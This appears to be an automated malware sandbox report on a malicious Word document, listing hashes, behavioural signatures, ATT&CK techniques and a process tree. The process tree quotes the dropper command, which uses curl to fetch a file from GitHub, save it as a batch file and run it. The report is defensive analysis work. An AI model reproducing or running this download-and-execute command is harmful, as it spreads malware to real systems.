Overview

overview

10

Static

static

8

4aadd3bf07...6d.doc

windows7-x64

10

4aadd3bf07...6d.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-04-2024 01:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d.doc

  • Size

    35KB

  • MD5

    582a41f1e6c7266f4473a396ed841261

  • SHA1

    0ac2b6ceb2ec13575b3b1448e72bc7958841b899

  • SHA256

    4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d

  • SHA512

    738e804dea2eaf95b4652958a9da042aa64bf39a0bb8a02101fbb9b03bc6867306d466122e96937112cdf11c96139a3a9a2fc82eb1d475be8c4629d4ed3b4b3c

  • SSDEEP

    192:wsWNslLZEvA+6/6r8px8SmvowzxeuQ9iBqyQYYTgN0j8ywc6tAHUkanRasQ:wC8iS8px8SMDen9BCUgN0jw/tgUkanj

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4604
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c curl https://raw.githubusercontent.com/NHTBOOT/1/main/pic.jpg --output %APPDATA%\Punn.bat && timeout 1 && start %APPDATA%\Punn.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3524
      • C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/NHTBOOT/1/main/pic.jpg --output C:\Users\Admin\AppData\Roaming\Punn.bat
        3⤵
          PID:4600
        • C:\Windows\system32\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:2772
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\Punn.bat
          3⤵
            PID:808

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Web Service

      1
      T1102

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Punn.bat
        Filesize

        14B

        MD5

        3be7b8b182ccd96e48989b4e57311193

        SHA1

        78fb38f212fa49029aff24c669a39648d9b4e68b

        SHA256

        d5558cd419c8d46bdc958064cb97f963d1ea793866414c025906ec15033512ed

        SHA512

        f3781cbb4e9e190df38c3fe7fa80ba69bf6f9dbafb158e0426dd4604f2f1ba794450679005a38d0f9f1dad0696e2f22b8b086b2d7d08a0f99bb4fd3b0f7ed5d8

        Download Submit
      • memory/4604-14-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-65-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-3-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-5-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-4-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-6-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-17-0x00007FF85F540000-0x00007FF85F550000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-8-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-9-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-10-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-11-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-12-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-13-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-15-0x00007FF85F540000-0x00007FF85F550000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-66-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-2-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-7-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-28-0x0000018CBD740000-0x0000018CBE710000-memory.dmp
        Filesize

        15.8MB

        Download
      • memory/4604-29-0x0000018CBD740000-0x0000018CBE710000-memory.dmp
        Filesize

        15.8MB

        Download
      • memory/4604-1-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-38-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-39-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-40-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-41-0x0000018CBD740000-0x0000018CBE710000-memory.dmp
        Filesize

        15.8MB

        Download
      • memory/4604-42-0x0000018CBD740000-0x0000018CBE710000-memory.dmp
        Filesize

        15.8MB

        Download
      • memory/4604-61-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-62-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-63-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-64-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-0-0x00007FF861CF0000-0x00007FF861D00000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4604-67-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download
      • memory/4604-16-0x00007FF8A1C70000-0x00007FF8A1E65000-memory.dmp
        Filesize

        2.0MB

        Download